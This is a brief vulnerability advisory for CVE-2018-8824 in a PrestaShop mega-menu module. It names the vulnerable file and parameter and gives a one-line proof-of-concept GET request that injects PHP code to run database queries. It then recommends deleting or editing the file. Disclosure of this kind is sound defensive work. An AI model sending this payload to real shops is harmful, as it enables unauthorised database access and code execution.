IA Informática Valencia

PrestasShop SQL Injection

CVE Ref: CVE-2018-8824
Release Date: 2018/03/06
Discover Credits: Andrea Iodice
Bulletin Author:  IA - Informática Avanzada
Contact: andrea@ia-informatica.com
Type: SQL Injection
Level: High
Vulnerable Application: Prestashop ( -

Responsive Mega Menu (Horizontal+Vertical+Dropdown) Pro
is a Module present in PrestaShop Addons Marketplace that allow multiple vulnerabilities.

File: /modules/bamegamenu/ajax_phpcode.php
Vulnerable Argument(s): $_POST[´code´]  or $_GET[´code´]

Proof of Concept:
GET: http://site/modules/bamegamenu/ajax_phpcode.php?code=p(Db::getInstance()->ExecuteS("show tables"));

modules/bamegamenu/ajax_phpcode.php in the Responsive Mega Menu (Horizontal+Vertical+Dropdown) Pro module 1.0.32 for PrestaShop through allows remote attackers to execute a SQL Injection trought PHP code via the code parameter.

Delete or edit the vulnerable file.

Contact Us

Powered by

Linux Apache PHP Mysql Metasploit HTML5